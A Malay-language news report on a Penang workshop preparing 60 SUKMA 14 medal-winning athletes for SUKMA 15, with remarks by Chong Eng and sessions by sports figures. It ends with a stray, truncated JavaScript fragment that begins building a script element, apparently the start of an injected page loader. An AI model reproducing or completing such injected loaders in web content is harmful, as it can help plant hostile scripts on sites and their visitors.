Bengkel Atlet Elit persediaan hadapi SUKMA Ke-15

Oleh : AHMAD ADIL MUHAMAD

KEPALA BATAS – Seramai 60 atlet negeri yang memenangi pingat pada kejohanan Sukan Malaysia (SUKMA) Ke-14 hadir pada penganjuran Bengkel Atlet Elit Sukan Malaysia 2015 sebagai persediaan menghadapi saingan di SUKMA Ke-15 yang belum ditetapkan tarikhnya.

Exco Belia & Sukan, Pembangunan Wanita, Keluarga & Komuniti, Chong Eng semasa memberikan ucapan perasmiannya berkata, atlet yang terpilih dianggap bertuah kerana segala usaha dan tenaga yang telah dikorbankan sejak menjadi atlet pelapis akhirnya membuahkan hasil sehingga terpilih menyertai skim istimewa berkaitan.

Hadir sama pada majlis anjuran Kerajaan Negeri dengan kerjasama Majlis Sukan Negeri Pulau Pinang (MSNPP) tersebut adalah Pengarah MSNPP, Frederick Tan. Tambah Chong Eng, intipati program tiga hari itu turut menyelitkan perkongsian pengalaman dan tip daripada atlet serta bekas atlet ternama negara.

“Saya pasti, ramai di antara atlet yang terpilih di sini inginkan kejayaan setaraf idola sukan masing-masing.

“Saya harap perkongsian pengalaman daripada Shazlin Zulkifli dalam acara boling dan Wong Choon Hann (badminton) akan dapat membantu anda menjadi cemerlang dan unggul seperti jaguh-jaguh ini,” ujar beliau.

Selain itu, Chong Eng memberitahu, para peserta turut didedahkan dengan bengkel nutrisi, bengkel psikologi dan taklimat mengenai ujian dopping bersempena penganjuran tersebut.

var d=document;var s=d.createElement(‘script’);